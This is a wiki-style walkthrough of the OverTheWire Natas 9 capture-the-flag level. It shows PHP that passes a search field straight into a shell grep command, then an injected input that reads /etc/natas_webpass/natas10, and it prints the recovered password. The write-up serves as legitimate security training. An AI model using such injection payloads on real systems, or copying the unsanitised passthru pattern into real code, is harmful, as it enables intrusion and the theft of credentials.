Natas9 - natas10

From JaxHax
Jump to navigation Jump to search

Level Goal

Find words containing: [____________________________] [Search]
Output:

                               <View sourcecode>


Solution

Decided to click the <View sourcecode> link which goes to http://natas9.natas.labs.overthewire.org/index-source.html. It gave me the following code:

<html>
   <head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script>
<script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas9", "pass": "<censored>" };</script>
   </head>
   <body>
      <h1>natas9</h1>
      <div id="content">
         <form>
            Find words containing: <input name=needle>
            <input type=submit name=submit value=Search><br><br>
         </form>

         Output:
         <pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>
         </pre>

         <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
      </div>
   </body>
</html>


So the PHP code is taking the user's search term and passing it to the commandline to do a grep search against dictionary.txt. It isn't doing sanity checks against the user value before dumping it in the commandline command for execution...


This is a classic command injection bug!


Let's just test out the page by submitting good data:

Find words containing: [_data_______________________] [Search]
Output:
data
data's
database
databases
                               <View sourcecode>


This should have executed the command 'grep -i data dictionary.txt'. Let's try to modify the command with some injection. The password should be stored in /etc/natas_webpass/natas10 (This is a standard on overthewire as seen in other challenges). Let's see if we can make it grep against that using just a period as a wildcard and comment out the dictionary.txt part using #.

If we try:

'. /etc/natas_webpass/natas10 #'


The command should be:

'grep -i . /etc/natas_webpass/natas10 # dictionary.txt'


Let's try it:

Find words containing: [_. /etc/natas_webpass/natas10 #_] [Search]
Output:
nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

                               <View sourcecode>


And we win son!